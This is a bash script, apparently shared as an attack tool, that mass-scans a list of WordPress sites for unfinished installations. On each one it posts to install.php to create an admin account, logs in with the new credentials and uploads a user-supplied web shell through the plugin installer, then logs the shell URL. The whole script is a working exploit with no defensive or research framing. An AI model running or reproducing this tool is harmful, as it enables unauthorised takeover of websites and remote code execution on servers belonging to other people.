WordPress Mass install

1. #!/bin/bash
2. #Coded By Con7ext
3. green='\e[92m'
4. blue='\e[34m'
5. red='\e[31m'
6. white='\e[39m'
7. COOKIE=cookie-`date +%s`
8. BULAN=`date +%m`
9. TAHUN=`date +%Y`
10. COOKIE_PATH="/tmp/$COOKIE"
11. COOKIE_LOG="/tmp/$COOKIE"
12. USER_AGENT="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0"
13. ekse(){
14.     if [[ $(curl --silent -d "weblog_title=RintoD&user_name=$user&admin_password=$pass&admin_password2=$pass&admin_email=$email&Submit=Install+Wordpress" --url "$site/wp-admin/install.php?step=2") =~ '<h1>Success!</h1>' ]];
15.     then
16.     printf "$green[+] Success [+]$white\n"
17.     echo "$site/wp-login.php" | tee -a $file
18.     echo "Username : $user" | tee -a $file
19.     echo "Password : $pass" | tee -a $file
20.     echo "Email    : $email" | tee -a $file
21.     login
22.     upload
23.     elif [[ $(curl --silent --url "$site/wp-admin/install.php") =~ '<h1>Already Installed</h1>' ]];
24.     then
25.     printf "$blue[!] $site Already Installed$white\n\n"
26.     elif [[ $(curl --silent --url "$site/wp-admin/install.php") =~ 'One or more database tables are unavailable' ]];
27.     then
28.     printf "$blue[!] $site Must Be Repair$white\n"
29.     echo "Repair Url : $site/maint/repair.php?referrer=is_blog_installed"
30.     else
31.     printf "$red[-] $site Not Vuln$white\n";
32.     fi
33. }
34. login(){
35.     curl -s -A "$USER_AGENT" -c "$COOKIE_PATH" $site/wp-login.php > /dev/null
36.     curl -c "$COOKIE_LOG" --silent -b "$COOKIE_PATH" -d "log=$user&pwd=$pass&wp-submit=Log+in&redirect_to=$site/wp-admin&testcookie=1" --url "$site/wp-login.php"
37.     status=$(curl --write-out %{http_code}  --silent -b "$COOKIE_PATH" -d "log=$user&pwd=$pass&wp-submit=Log+in&redirect_to=$site/wp-admin&testcookie=1" --url "$site/wp-login.php")
38.     if [[ $status == 302 ]];
39.     then
40.     echo "Login: Success" | tee -a $file
41.     else
42.     printf "$red[-]Login Failed$white Try Manual\n"
43.     fi
44.     rm "$COOKIE_PATH" 2> /dev/null
45. }
46. upload(){
47.     mek=`curl -s -b "$COOKIE_LOG" --url "$site/wp-admin/plugin-install.php" | grep -Po '(?<=name="_wpnonce" value=")[^"]*()'`
48.     mik=`curl -s -b "$COOKIE_LOG" --url "$site/wp-admin/plugin-install.php" | grep -Po '(?<=name="_wp_http_referer" value=")[^"]*()'`
49.     ups=`curl -s -b "$COOKIE_LOG" -F "_wpnonce=$mek" -F "_wp_http_referer=$mik" -F "pluginzip=@$shell" -F "install-plugin-submit=Install+Now" --url "$site/wp-admin/update.php?action=upload-plugin"`
50.     if [[ "$ups" =~ "Installing Plugin from uploaded file" ]];
51.     then
52.     echo "Success Uploading Shell $site/wp-content/uploads/$TAHUN/$BULAN/$shell" | tee -a $file
53.     else
54.     echo "Failed Try Manual"
55.     echo "$ups"
56.     fi
57.     rm "$COOKIE_LOG" 2> /dev/null
58. }
59. echo "Wp Install Mass Exploit"
60. echo "File Argumen is for save file :D just put your filename :D"
61. echo "Created By Con7ext"
62. read -p "List: " list
63. read -p "User: " user
64. read -p "Pass: " pass
65. read -p "Email: " email
66. read -p "Shell: " shell
67. read -p "File: " file
68. for site in `cat $list`;
69. do
70.         ekse $site &
71. done